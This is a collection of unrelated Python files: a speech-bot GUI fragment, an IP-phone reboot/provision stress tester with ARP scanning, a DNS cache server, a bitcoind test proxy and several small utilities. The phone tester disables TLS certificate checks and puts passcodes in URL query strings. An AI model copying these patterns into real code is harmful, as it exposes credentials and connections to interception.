letstalk_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\letstalklogotransparent.png")
letstalk_img=letstalk_img.subsample(3,3)
humatorob_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\high-five.png")
humatorob_img=humatorob_img.subsample(3,3)
stop_img=PhotoImage(file=r"D:\Python_files\Python\Project\Images\stop.png")
stop_img=stop_img.subsample(5,5)
Label(text="Speak Bot",font=myFont,pady=20,padx=800,fg="white",bg="#4c9aed").pack()
Button(screen1,image=robo_img,bg="#93bfed",bd=0).pack()
Button(screen1,image=letstalk_img,width=300,height=150,bg="#ddf0ce").place(x=300,y=150)
Button(screen1,image=dict_img,width=300,height=150,bg="#ddf0ce").place(x=200,y=350)
Button(screen1,image=quiz_image,width=300,height=150,bg="#ddf0ce").place(x=300,y=550)
Button(screen1,image=texttospeach_img,width=300,height=150,bg="#ddf0ce").place(x=950,y=150)
Button(screen1,image=speachtotext_img,width=300,height=150,bg="#ddf0ce").place(x=1000,y=350)
Button(screen1,image=humatorob_img,width=300,height=150,bg="#ddf0ce").place(x=950,y=550)
Button(screen1,image=stop_img,width=150,height=100,bg="#ddf0ce").place(x=700,y=680)
screen1.mainloop()
def quiz_screen(qu,ans,o1,o2,o3):
o1='1'+" "+o1
ans='3'+" "+ans
o3='2'+" "+o3
o2='4'+" "+o2
global screen2
screen2=Toplevel(screen1)
screen2.configure(bg="white")
screen2.title("Quiz")
screen2.geometry('1920x1080')
myfont=font.Font(size=20)
Label(screen2,text=qu,font=myfont).place(x=50,y=300)
Label(screen2,text=o1).place(x=500,y=450)
Label(screen2,text=o3).place(x=500,y=500)
Label(screen2,text=ans).place(x=800,y=450)
Label(screen2,text=o2).place(x=800,y=500)
def letstalk():
speaker.Speak("Say a keyword or ask something")
text=Operations.operations.getaudiodata()
text2=Operations.operations.textanalizer(text)
if text2==None:
speaker.Speak("These are the results founded in web")
else:
speaker.Speak(text2)
start()
def dictionary():
speaker.Speak("Say a keyword to search")
data=json.load(open("D:\Python_files\Python\Project\DataBase\Dictionary_data.json"))
text=Operations.operations.getaudiodata()
text=text.lower()
if text in data.keys():
speaker.Speak(data[text][0])
else:
speaker.Speak("Cant find please retry")
start()
def quiz():
data=json.load(open("D:\Python_files\Python\Project\DataBase\JEOPARDY_QUESTIONS1.json"))
quest_no=random.randint(0,50)
qu=data[quest_no]["question"]
ans=data[quest_no]["answer"]
o1=data[random.randint(0,50)]["answer"]
o2=data[random.randint(0,50)]["answer"]
o3=data[random.randint(0,50)]["answer"]
t2=threading.Thread(target=quiz_screen,args=(qu,ans,o1,o2,o3))
t2.start()
speaker.Speak("Lets start Quiz")
speaker.Speak(qu)
speaker.Speak(o1)
speaker.Speak(ans)
speaker.Speak(o2)
speaker.Speak(o3)
speaker.Speak("Say your answer")
answ=Operations.operations.getaudiodata()
if answ=='3' or answ=='three' or answ==ans or answ=="number three" or answ=="tree":
speaker.Speak("Correct answer")
screen2.destroy()
quiz()
else:
speaker.Speak("Wrong answer")
screen2.destroy()
start()
def filetospeech():
f=open("texttospeech.txt",'r')
text=f.read()
speaker.Speak(text)
start()
def speechtotext():
speaker.Speak("Say to write")
f=open("speechtotext.txt",'w')
text=Operations.operations.getaudiodata()
f.write(text)
f.close()
speaker.Speak("Succesfully written")
start()
def recordvoice():
flag=1
speaker.Speak("Say something")
with sr.Microphone() as source:
l.adjust_for_ambient_noise(source)
while flag:
audio_data=l.record(source,duration=3)
try:
text=l.recognize_google(audio_data)
with open("changedaudio.wav","wb") as f:
f.write(audio_data.get_wav_data())
flag=0
except:
speaker.Speak("Cant hear any thing")
speaker.Speak("Data changed and saved")
start()
def start():
flag=-1
while flag==-1:
speaker.Speak("How can I help you")
text=Operations.operations.getaudiodata()
flag=Operations.operations.countrolanalizer(text)
if flag==1:
letstalk()
elif flag==2:
dictionary()
elif flag==3:
quiz()
elif flag==4:
filetospeech()
elif flag==5:
speechtotext()
elif flag==6:
recordvoice()
screen1.destroy()
Homepage_t1=threading.Thread(target=homepage)
Homepage_t1.start()
start() |
apiTest.py | # -*- coding: utf-8 -*-
import json
import sys
import socket
import requests
import tftpServer
from collections import deque
import time
from scapy.all import *
from threading import Thread
# core dump check
# point out where to save it.
# python check and download file
# python send http / https request
def search_lan_mac(ip):
conf.route.resync()
conf.route.route('0.0.0.0')[0]
# show_interfaces()
get_working_if()
addr = ip.split('.')
lan = addr[0] + "." + addr[1] + "." + addr[2] + ".1/24"
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=lan), timeout=3, verbose=False)
for snd, rcv in ans:
cur_mac = rcv.sprintf("%Ether.src%")
cur_ip = rcv.sprintf("%ARP.psrc%")
if cur_ip == ip:
return cur_mac
return False
def search_ip(ip,mac):
conf.route.resync()
conf.route.route('0.0.0.0')[0]
# show_interfaces()
get_working_if()
addr = ip.split('.')
lan = addr[0] + "." + addr[1] + "." + addr[2] + ".1/24"
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=lan), timeout=3, verbose=False)
for snd, rcv in ans:
cur_mac = rcv.sprintf("%Ether.src%")
cur_ip = rcv.sprintf("%ARP.psrc%")
if cur_mac == mac:
if ip.strip() != cur_ip.strip():
ip = cur_ip.strip()
return cur_ip
return ip
def sendHttpReuqest(url,http):
try:
pos = url.find("passcode=")
print(url[:pos] + "passcode=*****")
except:
print(url)
if http:
res = requests.get("http://" + url, verify = False)
print(res)
return res
else:
res = requests.get("https://" + url, verify = False)
print(res)
return res
class apiTester():
def __init__(self):
self.ip = ""
self.userName = ""
self.password = ""
self.interval = 100
self.loop = 1
self.testType = "reboot"
self.version1 = ""
self.version1 = ""
self.version1 = ""
self.dir1 = ""
self.dir2 = ""
self.dir3 = ""
self.serverType = 1 # 1 means http
self.mac = ""
self.messageList = deque()
self.errorCount = 0
self.http = True
self.foundCoreStop = False
self.coreDumpPath = ".\\"
self.testStatus = [False,0,0,"ip","mac"]
self.enableAI = False
def setEnableAI(self, enable):
self.enableAI = enable
def setCNN(self,cnnP):
self.cnn = cnnP
def setServerType(self,serverType):
if serverType == "tftp":
self.serverType = 0
elif serverType == "http":
self.serverType = 1
elif serverType == "https":
self.serverType = 2
elif serverType == "ftp":
self.serverType = 3
elif serverType == "ftps":
self.serverType = 4
def setVersion(self,v1,v2,v3,d1,d2,d3):
self.version1 = v1
self.version2 = v2
self.version3 = v3
self.dir1 = d1
self.dir2 = d2
self.dir3 = d3
def setTestStatus(self,status,messageList,path):
self.testStatus = status
self.messageList = messageList
self.coreDumpPath = path
def setFoundCoreStop(self,stop):
self.foundCoreStop = stop
def setValue(self,ip,user,password,interval,loop,testType):
self.ip = ip
self.userName = user
self.password = password
self.interval = interval
self.loop = loop
self.testType = testType
#
t = Thread(target=tftpServer.lauchServer,args=())
t.start()
def initPhone(self):
url = self.ip
url += "/cgi-bin/api-request_init_phone_status?passcode="
url += self.password
try:
res = sendHttpReuqest(url,self.http)
except:
if self.loop == 0:
self.http = not self.http
try:
self.checkAndWait(5)
res = sendHttpReuqest(url,self.http)
except:
self.outputMessage("destination unreachable !")
self.errorCount += 1
if self.loop == 0:
self.testStatus[0] = False
return False
if res.status_code == 200:
self.outputMessage("init phone success")
return True
elif res.status_code == 401:
self.outputMessage("话机 未鉴权,请检查IP地址和密码",1)
self.testStatus[0] = False
return False
elif res.status_code == 500:
self.outputMessage("device return code:500",1)
return False
else:
return False
def rebootPhone(self):
url = self.ip
url += "/cgi-bin/api-sys_operation?passcode="
url += self.password + "&request=REBOOT"
try:
sendHttpReuqest(url,self.http)
self.outputMessage("send Reboot API ")
except:
self.errorCount += 1
self.outputMessage("reboot Api connect failed",1)
self.checkAndWait(10)
def resetPhone(self):
url = self.ip
url += "/cgi-bin/api-sys_operation?passcode="
url += self.password + "&request=RESET"
try:
sendHttpReuqest(url,self.http)
except:
self.errorCount += 1
self.outputMessage("reset Api connect failed",1)
self.checkAndWait(10)
def provisionPhone(self):
url = self.ip
url += "/cgi-bin/api-sys_operation?request=PROV&passcode="
url += self.password
try:
sendHttpReuqest(url,self.http)
except:
# it may already in provision status, after config setting change
# self.outputMessage("provision Api connect failed",1)
self.checkAndWait(4)
def coreDumpCheckAndDownload(self):
url = self.ip
url += "/cgi-bin/api-download_coredump?passcode=" + self.password
try:
res = sendHttpReuqest(url,self.http) # set stream = True
except:
self.outputMessage("core dump check Api connect failed",1)
self.checkAndWait(10)
return False
if res.status_code == 404:
return False
name = str(res.headers)
pos = name.find("filename")
pos = name.find('"',pos)
end = name.find('"',pos+1)
name = name[pos+1:end]
#download file
with open(self.coreDumpPath + "\\" + name, 'wb') as f:
for data in res.iter_content(1024):
f.write(data)
f.close()
self.outputMessage("found core dump",1)
self.outputMessage(name)
return True
def getPvalue(self,pvalue):
url = self.ip
url += "/cgi-bin/api.values.get?request=" + pvalue
url += "&passcode=" + self.password
res = ""
try:
res = sendHttpReuqest(url,self.http)
except:
self.checkAndWait(5)
try:
res = sendHttpReuqest(url,self.http)
except:
self.outputMessage("get pvalue failed",1)
return "ERROR"
if res.status_code != 200:
self.outputMessage("Response: " + str(res.status_code) , 1)
return "ERROR"
try:
# value = json.load(res.text).get("body").get(pvalue)
pos = res.text.index("\"" + pvalue + "\"" )
pos = res.text.index(":",pos+1)
pos = res.text.index("\"",pos+1)
end = res.text.index("\"",pos+1)
value = res.text[pos+1:end]
return value
except:
self.outputMessage("get pvalue response format error",1)
self.outputMessage(res.text,0)
return "ERROR"
def outputMessage(self,msg,status = 0):
if status == 1:
msg = "<span style=\"color:red\">" + msg + "</span>"
elif status == 2:
msg = "<span style=\"color:blue\">" + msg + "</span>"
else:
msg = "<span style=\"color:black\">" + msg + "</span>"
timeStr = "<span style=\"color:black\">" + time.strftime("[%m-%d %H:%M:%S] ",time.localtime())
msg = timeStr + "</span>" + msg
self.messageList.append(msg)
# print (msg)
def prepareCfgFile(self,serverType,objectDir):
cfgFile = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n"
cfgFile += "<gs_provision version=\"1\">\n"
cfgFile += "<config version=\"1\">\n"
cfgFile += "<P238>0</P238>\n"
cfgFile += "<P6767>" + str(serverType) + "</P6767>\n"
cfgFile += "<P8375>0</P8375>\n"
cfgFile += "<P232></P232>\n"
cfgFile += "<P233></P233>\n"
cfgFile += "<P6768></P6768>\n"
cfgFile += "<P6769></P6769>\n"
cfgFile += "<P192>" + objectDir + "</P192>\n"
cfgFile += "</config>\n"
cfgFile += "</gs_provision>\n"
return cfgFile
def checkAndWait(self,count):
self.outputMessage("wait:" + str(count))
for i in range(count):
time.sleep(1)
if count > 4:
self.testStatus[2] = count - i
if self.testStatus[0] == False:
self.testStatus[2] = 0
break
self.testStatus[2] = 0
def activelyWait(self,count,wishLabel):
self.outputMessage("max wait:" + str(count))
ensureCount = 0
for i in range(count):
time.sleep(1)
self.testStatus[2] = count - i
res, label, acc = self.cnn.predict()
if self.testStatus[2] > 5:
if res == False or acc <0.6:
continue
if label == wishLabel and acc >0.6:
ensureCount += 1
if ensureCount >= 2:
self.outputMessage("status change: " + label, 2)
self.checkAndWait(4)
self.testStatus[2] = 0
return True
else:
ensureCount = 0
if self.testStatus[0] == False:
self.testStatus[2] = 0
break
self.testStatus[2] = 0
return False
def updateConfig(self):
host = ""
try:
# host = socket.gethostbyname(socket.getfqdn(socket.gethostname()[0]))
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
host = s.getsockname()[0]
s.close()
except:
self.outputMessage("Get local host ip failed")
self.errorCount += 1
return False
url = self.ip
url += "/cgi-bin/api-provision?server=tftp://"
url += host + ":6699"
url += "&passcode=" + self.password
try:
sendHttpReuqest(url,self.http)
return True
except:
self.checkAndWait(5)
try:
sendHttpReuqest(url,self.http)
return True
except:
self.outputMessage("Set config Api connect failed")
self.errorCount += 1
return False
def executeTestFlow(self):
var = search_lan_mac(self.ip)
if var != False:
self.mac = var
self.testStatus[0] = True
self.testStatus[4] = self.mac
self.errorCount = 0
successCount = 0
for i in range(self.loop):
ip = search_ip(self.ip,self.mac)
if ip != self.ip:
self.outputMessage("update new ip: " + ip,0)
self.ip = ip
if self.testStatus[0] == False:
break
self.testStatus[1] = i
self.testStatus[3] = self.ip
if self.errorCount>5:
self.testStatus[0] = False
self.outputMessage("连续失败5-6次,终止测试",2)
break
self.outputMessage("-------loop: " + str(i) +" success:" + str(successCount) + "---------",2)
initResult = self.initPhone()
if initResult != True:
if self.errorCount>5 or self.testStatus[0] == False:
break
else:
continue
contain = self.coreDumpCheckAndDownload()
if contain and self.foundCoreStop: # and foundToStops
self.outputMessage("found core dump stop Test, if you want to continue, please change advance option")
break
self.outputMessage("check core Dump finished")
if self.testStatus[0] == False:
break
if self.testType == "Reboot":
self.rebootPhone()
# use camera help to check devic status--
if self.enableAI:
res = self.activelyWait(20,"boot")
if res == False:
self.outputMessage("send reboot api, but device no response (20s)",1)
self.errorCount += 1
self.outputMessage("start next loop after wait 25s",0)
self.checkAndWait(25)
continue
if self.testStatus[0] == False:
break
res = self.activelyWait(self.interval,"idle")
if res == False:
self.outputMessage("device reboot timeout, not back to idle status",1)
self.errorCount += 1
continue
else:
self.outputMessage("reboot susccess")
#after reboot finished, need wait api setup
self.outputMessage("wait for api setup",0)
self.checkAndWait(25)
else:
self.checkAndWait(self.interval)
self.outputMessage("reboot susccess")
successCount += 1
self.errorCount = 0
elif self.testType == "Reset": # after reset, api remote control set to disable ?
self.resetPhone()
self.password = "admin"
self.checkAndWait(self.interval)
elif self.testType == "Provision":
self.outputMessage(" get device version")
currentVersion = self.getPvalue("68")
if currentVersion == "ERROR":
self.errorCount += 1
continue
self.outputMessage("current version:" + currentVersion)
objVersion = self.version1
objDir = self.dir1
if self.version3 != "":
if self.version1 == currentVersion:
objVersion = self.version2
objDir = self.dir2
elif self.version2 == currentVersion:
objVersion = self.version3
objDir = self.dir3
elif self.version3 == currentVersion:
objVersion = self.version1
objDir = self.dir1
else:
if objVersion == currentVersion:
objVersion = self.version2
objDir = self.dir2
self.outputMessage("start provision...",0)
self.outputMessage(currentVersion + " -> " + objVersion,0)
cfgFile = self.prepareCfgFile(self.serverType,objDir)
prefix = self.getPvalue("P234")
postfix = self.getPvalue("P235")
if prefix == "ERROR" or postfix == "ERROR":
self.errorCount += 1
continue
# need test it
macStr = self.mac.replace(":","")
macStr = macStr.lower()
fileName = "configXml\\" + prefix + "cfg" + macStr + ".xml" + postfix
f = open(fileName, "w")
f.write(cfgFile)
f.close()
self.outputMessage("upload config file")
uploadResult = self.updateConfig()
if uploadResult == False:
self.checkAndWait(10)
continue
# need check angain ? see value change is success. if config failed
# could reduce waiting time
# if pvalue set right, this api not neccesy
self.provisionPhone()
if self.enableAI:
res = self.activelyWait(20,"boot")
if res == False:
self.outputMessage("send provision api, but device no response",1)
self.outputMessage("retry after wait 25s")
self.checkAndWait(25)
self.errorCount += 1
continue
res = self.activelyWait(self.interval,"idle")
if res == False:
self.outputMessage("device provision timeout, device not back to idle",1)
self.errorCount += 1
continue
self.outputMessage("device back to idle, wait for api setup")
self.checkAndWait(25)
else:
self.checkAndWait(self.interval)
if self.testStatus[0] == False:
break
#update Ip than check version is right!
ip = search_ip(self.ip,self.mac)
if ip != self.ip:
self.outputMessage("update new ip :" + ip,0)
self.ip = ip
self.testStatus[3] = self.ip
self.initPhone()
newVersion = self.getPvalue("68")
if newVersion != objVersion:
self.outputMessage("provision failed, version is not: [" + objVersion + "]",1)
self.outputMessage("current version : [" + newVersion + "]",2)
self.outputMessage("previous version: [" + currentVersion + "]",0)
# target error one time
self.errorCount += 1
self.outputMessage("check failed reason...")
if newVersion == "ERROR":
self.outputMessage("interval time maybe too short, or connect device failed")
else:
checkDir = self.getPvalue("P192")
if checkDir != objDir and checkDir != "ERROR":
self.outputMessage("config file uploaded failed",1)
else:
self.outputMessage("provsion success")
self.errorCount = 0
successCount += 1
#also need update other info.
self.outputMessage("Test finished",2)
self.outputMessage("Success Time:" + str(successCount))
self.testStatus[0] = False
if __name__ == "__main__":
cnnP = CNN()
cnnP.loadModel()
t = Thread(target=cnnP.openCamera,args=())
t.start()
api = apiTester()
api.setCNN(cnnP)
ip = "192.168.92.11"
passwd = "123"
username = "admin"
ptime = 400
loop = 5
v1 = "0.2.13.45"
v2 = "1.0.11.6"
v3 = ""
d1 = "192.168.92.45:8080/0.2.13.45_fw/"
d2 = "192.168.92.45:8080/1_0_11_6_fw/"
d3 = ""
api.setVersion(v1,v2,v3,d1,d2,d3)
path = ""
testStatus = [False,0,0,"ip","mac"]
messageList = deque()
api.setValue(ip,username,passwd,ptime,loop,"Reboot")
api.setTestStatus(testStatus,messageList,path)
api.setFoundCoreStop(False)
api.setEnableAI(True)
api.executeTestFlow()
|
asyncdns.py | # request serialization definition
# the first one character decides
# wehter it is a submit[s], request[r] or quit[q]
# the next two char are digit ranging from 0~99 mark the length of the domain
# the following is the domain name string, the length is specified by digits
# The last is the type of the dns resolving request, which includes:
# A: rr.A
# If the string is not recognized, then send A request
import adns
import SocketServer
import threading
from multiprocessing import Process, Condition, Event
import socket
import sys
# This is the handler of the request
# This implemented the persistence connection
# A manual shutdown signal has to be sent to the socket
class ThreadedRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
while True:
try:
data = self.rfile.readline().strip()
except Exception as e:
print e # log exception to terminal
break
request_type = data[0]
if request_type == "s":
self._subHandle(data)
elif request_type == "r":
response = self._reqHandle(data)
try:
self.wfile.write(response)
except Exception:
break
elif request_type == "q":
break
else:
# TODO: Think about this situation
break
try:
self.wfile.write("q\n")
except Exception:
pass
def _subHandle(self, data):
digit = int(data[1:3])
domain = data[3:3+digit]
record_type = data[3+digit:]
# Don't check whether it has been already cached
# because ip could be updated and it doesn't slow down speed much
with self.server._work_indicator:
if record_type == "CNAME":
query = self.server.c.submit(domain, adns.rr.CNAME)
else:
query = self.server.c.submit(domain, adns.rr.A)
self.server.host_cache[query] = domain
self.server._work_indicator.notify()
def _reqHandle(self, data):
digit = int(data[1:3])
domain = data[3:3+digit]
if domain in self.server.ip_cache:
ip = self.server.ip_cache[domain]
else:
ip = ""
digit_length = str(len(ip))
if len(digit_length) == 1:
response = "".join(["0", digit_length, ip, '\n'])
else:
response = "".join([digit_length, ip, '\n'])
return response
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass, others):
SocketServer.TCPServer.__init__(self, server_address,
RequestHandlerClass)
self.c = others[0]
self.ip_cache = others[1]
self.host_cache = others[2]
self._work_indicator = others[3]
class DnsChecker(Process):
def __init__(self, host, port, flags=None):
Process.__init__(self)
self.adns_state = adns.init()
self.ip_cache = {}
self.host_cache = {}
# self._workload = threading.Condition()
self._workload = flags[0] if flags and len(flags) > 0 else \
threading.Condition()
self.host = host
self.port = port
# self._stop = threading.Event()
self._stop = flags[1] if flags and len(flags) > 1 else threading.Event()
self._prints = flags[2] if flags and len(flags) > 2 else True
def close(self):
self._stop.set()
with self._workload:
self._workload.notify()
def run(self):
if self._prints:
print "DNS cache server is running at: %s:%d" % (self.host,
self.port)
print "This server uses BIND9 and GNU adns library to resolve dns"
print "To submit queries," \
" please use DnsBuffer() function to create a query object"
self.server = ThreadedTCPServer((self.host, self.port),
ThreadedRequestHandler,
(self.adns_state, self.ip_cache,
self.host_cache, self._workload))
self.host, self.port = self.server.server_address
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
while not self._stop.is_set():
with self._workload:
while len(self.host_cache) > 0:
for query in self.adns_state.completed():
ip = query.check()
host = self.host_cache[query]
del self.host_cache[query]
if len(ip[3]) >= 1:
self.ip_cache[host] = ip[3][0]
self._workload.wait()
self.server.shutdown()
def __del__(self):
self.close()
def DnsCacher(host="localhost", port=5436):
flags = [Condition(), Event(), False]
dns_checker = DnsChecker(host, port, flags)
dns_checker.daemon = False
dns_checker.start()
return dns_checker
class DnsRequirer:
def __init__(self, host, port, restart=False):
self.host = host
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.host, self.port))
self._restart_flag = restart
def submit(self, domain, rtype="A"):
if len(domain) > 100:
return False
digit = str(len(domain))
if len(digit) == 1:
request = "".join(["s0", digit, domain, rtype, '\n'])
else:
request = "".join(["s", digit, domain, rtype, '\n'])
try:
self.socket.sendall(request)
except socket.error:
if self._restart_flag:
self.restart()
self.socket.sendall(request)
return True
else:
raise
else:
return True
def require(self, domain):
if len(domain) > 100:
return None
digit = str(len(domain))
if len(digit) == 1:
request = "".join(["r0", digit, domain, '\n'])
else:
request = "".join(["r", digit, domain, '\n'])
try:
return self._requireIP(request)
except socket.error:
if self._restart_flag:
self.restart()
return self._requireIP(request)
else:
raise
return None
def _requireIP(self, request):
self.socket.sendall(request)
response = self.socket.recv(1024).strip()
digit = int(response[0:2])
ip = response[2:2+digit]
return ip
def restart(self):
try:
self.socket.sendall("q\n")
except Exception:
pass
self.socket.close()
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.host, self.port))
def __del__(self):
try:
self.socket.sendall("q\n")
except Exception:
pass
finally:
self.socket.close()
def DnsBuffer(host="localhost", port=5436):
dns_request = DnsRequirer(host, port)
return dns_request
if __name__ == "__main__":
args = sys.argv[1:]
flags = [Condition(), Event()]
if len(args) == 2:
dns_checker = DnsChecker(args[0], args[1], flags)
else:
dns_checker = DnsChecker("localhost", 5436, flags)
dns_checker.daemon = True
dns_checker.start()
dns_checker.join()
dns_checker.close()
|
btcproxy.py | """ A bitcoind proxy that allows instrumentation and canned responses
"""
from flask import Flask, request
from bitcoin.rpc import JSONRPCError
from bitcoin.rpc import RawProxy as BitcoinProxy
from cheroot.wsgi import Server
from cheroot.wsgi import PathInfoDispatcher
import decimal
import flask
import json
import logging
import threading
class DecimalEncoder(json.JSONEncoder):
"""By default json.dumps does not handle Decimals correctly, so we override it's handling
"""
def default(self, o):
if isinstance(o, decimal.Decimal):
return "{:.8f}".format(float(o))
return super(DecimalEncoder, self).default(o)
class BitcoinRpcProxy(object):
def __init__(self, bitcoind, rpcport=0):
self.app = Flask("BitcoindProxy")
self.app.add_url_rule("/", "API entrypoint", self.proxy, methods=['POST'])
self.rpcport = rpcport
self.mocks = {}
self.mock_counts = {}
self.bitcoind = bitcoind
self.request_count = 0
def _handle_request(self, r):
brpc = BitcoinProxy(btc_conf_file=self.bitcoind.conf_file)
method = r['method']
# If we have set a mock for this method reply with that instead of
# forwarding the request.
if method in self.mocks and type(self.mocks[method]) == dict:
ret = {}
ret['id'] = r['id']
ret['error'] = None
ret['result'] = self.mocks[method]
self.mock_counts[method] += 1
return ret
elif method in self.mocks and callable(self.mocks[method]):
self.mock_counts[method] += 1
return self.mocks[method](r)
try:
reply = {
"result": brpc._call(r['method'], *r['params']),
"error": None,
"id": r['id']
}
except JSONRPCError as e:
reply = {
"error": e.error,
"code": -32603,
"id": r['id']
}
self.request_count += 1
return reply
def proxy(self):
r = json.loads(request.data.decode('ASCII'))
if isinstance(r, list):
reply = [self._handle_request(subreq) for subreq in r]
else:
reply = self._handle_request(r)
response = flask.Response(json.dumps(reply, cls=DecimalEncoder))
response.headers['Content-Type'] = 'application/json'
return response
def start(self):
d = PathInfoDispatcher({'/': self.app})
self.server = Server(('0.0.0.0', self.rpcport), d)
self.proxy_thread = threading.Thread(target=self.server.start)
self.proxy_thread.daemon = True
self.proxy_thread.start()
# Now that bitcoind is running on the real rpcport, let's tell all
# future callers to talk to the proxyport. We use the bind_addr as a
# signal that the port is bound and accepting connections.
while self.server.bind_addr[1] == 0:
pass
self.rpcport = self.server.bind_addr[1]
logging.debug("BitcoinRpcProxy proxying incoming port {} to {}".format(self.rpcport, self.bitcoind.rpcport))
def stop(self):
self.server.stop()
self.proxy_thread.join()
logging.debug("BitcoinRpcProxy shut down after processing {} requests".format(self.request_count))
def mock_rpc(self, method, response=None):
"""Mock the response to a future RPC call of @method
The response can either be a dict with the full JSON-RPC response, or a
function that returns such a response. If the response is None the mock
is removed and future calls will be passed through to bitcoind again.
"""
if response is not None:
self.mocks[method] = response
self.mock_counts[method] = 0
elif method in self.mocks:
del self.mocks[method]
|
Snapshot.py | from . import globals as G
import requests, sys, time, os, threading
class Snapshot:
"""
Represents a snapshot for selenium tests
:param hash: the hash for this image, returned by rest api when taking a screenshot
:param test: an AutomatedTest object that represents a test currently running
"""
def __init__(self, hash, test):
self.hash = hash
self.testId = test.testId
self.getInfo()
def getInfo(self):
"""
Calls out to api to get updated info for this snapshot
:returns: a python dict object with all of the info for this Snapshot
"""
self.info = requests.get(G.api + self.testId + '/snapshots/' + self.hash, auth=(G.username, G.authkey)).json()
return self.info
def setDescription(self, description):
"""
Sets the description for this snapshot
"""
url = G.api + self.testId + '/snapshots/' + self.hash
self.info = requests.put(url, auth=(G.username, G.authkey), data={'description':description})
def saveLocally(self, location):
"""
Async method to download this snapshot to the location given
:param location: a string with the location and filename for the image. Should have a .png extension
"""
t = threading.Thread(target=Snapshot.__saveSnapshot, args=(self, location))
t.start()
def __saveSnapshot(self, location):
url = self.getInfo()['image']
r = requests.get(url, stream=True)
timeout = 15
iteration = 1
while (iteration < timeout) and (r.status_code != 200):
r = requests.get(url, stream=True)
iteration += 1
time.sleep(1)
if iteration < timeout:
path = os.path.split(location)[0]
if not os.path.exists(path):
os.mkdir(path)
with open(location, 'wb') as f:
for chunk in r.iter_content(chunk_size=128):
f.write(chunk)
|
downloader.py | import os
import re
import threading
import time
import urllib
from urllib.parse import urlparse
import requests
class Downloader:
url_lists = []
start_index = 0
default_dldir = None
window = None
def __init__(self, window, txt, default_dldir, start):
self.window = window
self.default_dldir = default_dldir
self.start_index = start
lists = txt.splitlines()
for lst in lists:
lst.strip()
if lst.find(r'http:') == 0 or lst.find(r'https:') == 0:
self.url_lists.append(lst)
diridx = 0
while True:
diridx += 1
dlpath = f'{self.default_dldir}{os.sep}downloader' + str(diridx)
if not os.path.exists(dlpath):
os.makedirs(dlpath, exist_ok=True)
self.default_dldir = dlpath
break
def create_thread(self):
self.window['_DOWNLOAD_ALL_'].update(disabled=True)
threading.Thread(target=self.start, args=(), daemon=True).start()
def start(self):
if self.start_index < len(self.url_lists):
self.download_file(self.url_lists[self.start_index])
self.start_index += 1
val = (self.start_index / len(self.url_lists)) * 100
self.show_total_progress(val)
self.show_progress(0)
time.sleep(0.2)
self.start()
else:
self.show_total_progress(100)
self.window['_DOWNLOAD_ALL_'].update(disabled=False)
def show_progress(self, val):
self.window['_PROGRESS_BAR_'].UpdateBar(val)
def show_total_progress(self, val):
self.window['_TOTAL_PROGRESS_BAR_'].UpdateBar(val)
def download_file(self, file_url):
parse_url = urlparse(file_url)
fname = urllib.parse.unquote(parse_url.path[parse_url.path.rfind('/') + 1:])
fname = os.path.basename(fname)
file_name = self.default_dldir + os.sep + fname
re.sub(r'[\\/:*?"<>|]+','',file_name)
headers = requests.head(file_url).headers
try:
total_length = int(headers["content-length"])
except Exception as e:
print(e)
total_length = None
response = requests.get(file_url, stream=True)
try:
with open(file_name, "wb") as f:
if total_length is None:
f.write(response.content)
else:
dl = 0
total_length = int(total_length)
for data in response.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
done = dl / total_length * 100
self.show_progress(done)
except FileNotFoundError as e:
print("FileNotFoundError", e)
print(file_url)
print(file_name)
except Exception as e:
print(e)
|
cuteprint.py | #!/usr/bin/env python
# encoding: utf-8
# This script is compatible with both Python 2 and 3
import sys
import threading
import time
class PrettyPrinter :
# Colorized Output Functions
def green(self, s):
return '\033[1;32m{}\033[0m'.format(s)
def red(self, s):
return '\033[1;31m{}\033[0m'.format(s)
def blue(self, s):
return '\033[1;34m{}\033[0m'.format(s)
def pink(self, s):
return '\033[1;35m{}\033[0m'.format(s)
def white(self, s):
return '\033[1;37m{}\033[0m'.format(s)
# Pretty-Print Contextual Functions
def custom_print(self, string, color, symbol, end, elapsed_time=None, replace_line=False):
if elapsed_time:
to_print = '{} {} {} {}'.format(color(symbol), str(string), 'in {} seconds'.format(elapsed_time), end)
else:
to_print = '{} {} {}'.format(color(symbol), str(string), end)
if replace_line :
to_print = '\r{}'.format(to_print)
print(to_print)
def print_good(self, s, end='\n', replace_line=False):
self.custom_print(string=s, color=self.green, symbol='[+]', replace_line=replace_line, end=end)
def print_bad(self, s, end='\n', replace_line=False):
self.custom_print(string=s, color=self.red, symbol='[-]', replace_line=replace_line, end=end)
def print_info(self, s, end='\n', replace_line=False, elapsed_time=None):
self.custom_print(string=s, color=self.blue, symbol='[!]', replace_line=replace_line, elapsed_time=elapsed_time, end=end)
def print_question(self, s, end='\n', replace_line=False):
self.custom_print(string=s, color=self.white, symbol='[?]', replace_line=replace_line, end=end)
def print_separator(self, length=150, suffix=None, separator='.', end='\n'):
if suffix != None:
final_len = length-len(suffix)-1
print("{} {}".format(suffix, separator*final_len+end))
else:
print(separator*length+end)
def print_title(self, title, top='=', bottom='=', left='>', right='<', caps=True):
print('\n')
print(self.white(top*(len(title)+4)))
if caps :
print(self.white("{} {} {} ".format(left,title.upper(),right)))
else:
print(self.white("{} {} {} ".format(left,title,right)))
print(self.white(bottom*(len(title)+4))+'\n\n')
def print_blank(self):
print('\n')
# Progress Dotted-Bar Functions
def progress(self, task, enable_dots, char):
start_time = time.time()
t = threading.currentThread()
s = char
self.print_info(task)
while getattr(t, "load", True):
if enable_dots:
sys.stdout.write(s)
sys.stdout.flush()
time.sleep(1)
self.print_info("Task << {} >> : Done".format(task), replace_line=True, elapsed_time=(time.time() - start_time), end="\n")
def start_progress(self, task, enable_dots=True, char='.'):
t = threading.Thread(target=self.progress, args=(task,enable_dots,char))
